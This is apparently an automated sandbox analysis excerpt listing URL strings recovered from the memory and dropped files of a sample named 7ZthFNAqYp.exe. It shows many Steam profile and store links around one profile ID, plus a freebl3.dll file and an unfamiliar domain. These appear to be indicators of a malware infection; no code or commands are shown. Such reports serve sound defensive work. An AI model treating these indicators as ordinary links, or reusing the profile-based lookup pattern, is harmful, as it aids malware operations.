                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_global.css?v=_CwtgIbuqQ1L&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR9MtmbWSZEp&l=engli
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&l=engl
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_global.js?v=7glT1n_nkVCs&l=eng
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunf
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://help.steampowered.com/en/
                          Source: CFCFHJ.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: https://mozilla.org0/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/discussions/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199786602107
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/market/
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                          Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107$
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/badges
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/inventory/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997866021077
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107H
                          Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://store.steampo
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
